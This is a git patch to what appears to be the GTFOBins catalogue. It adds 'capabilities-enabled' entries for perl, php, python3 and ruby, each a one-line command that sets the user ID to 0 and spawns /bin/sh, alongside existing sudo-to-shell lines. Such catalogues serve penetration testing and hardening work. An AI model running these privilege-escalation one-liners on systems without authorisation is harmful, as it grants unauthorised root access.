From c7375411b7c601509d15310b83e8086d078604b1 Mon Sep 17 00:00:00 2001 From: Emilio Pinna Date: Wed, 12 Sep 2018 21:57:04 +0100 Subject: [PATCH] Add capabilities to perl, php, python3, and ruby --- _gtfobins/perl.md | 2 ++ _gtfobins/php.md | 4 ++++ _gtfobins/python3.md | 2 ++ _gtfobins/ruby.md | 2 ++ 4 files changed, 10 insertions(+) diff --git a/_gtfobins/perl.md b/_gtfobins/perl.md index d3c0e0f..d12e1f8 100644 --- a/_gtfobins/perl.md +++ b/_gtfobins/perl.md @@ -12,4 +12,6 @@ functions: - code: ./perl -e 'exec "/bin/sh";' sudo-enabled: - code: sudo perl -e 'exec "/bin/sh";' + capabilities-enabled: + - code: ./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";' --- diff --git a/_gtfobins/php.md b/_gtfobins/php.md index 05f41ea..7acdeb1 100644 --- a/_gtfobins/php.md +++ b/_gtfobins/php.md @@ -46,4 +46,8 @@ functions: - code: | CMD="/bin/sh" sudo php -r "system('$CMD');" + capabilities-enabled: + - code: | + CMD="/bin/sh" + ./php -r "posix_setuid(0); system('$CMD');" --- diff --git a/_gtfobins/python3.md b/_gtfobins/python3.md index d340df1..d71c0a4 100644 --- a/_gtfobins/python3.md +++ b/_gtfobins/python3.md @@ -34,4 +34,6 @@ functions: - code: ./python3 -c 'import os; os.system("/bin/sh -p")' sudo-enabled: - code: sudo python3 -c 'import os; os.system("/bin/sh")' + capabilities-enabled: + - code: ./python3 -c 'import os; os.setuid(0); os.system("/bin/sh")' --- diff --git a/_gtfobins/ruby.md b/_gtfobins/ruby.md index 65c0d3c..1fe9fdb 100644 --- a/_gtfobins/ruby.md +++ b/_gtfobins/ruby.md @@ -29,4 +29,6 @@ functions: - code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")' sudo-enabled: - code: sudo ruby -e 'exec "/bin/sh"' + capabilities-enabled: + - code: ./ruby -e 'Process::Sys.setuid(0); exec "/bin/sh"' ---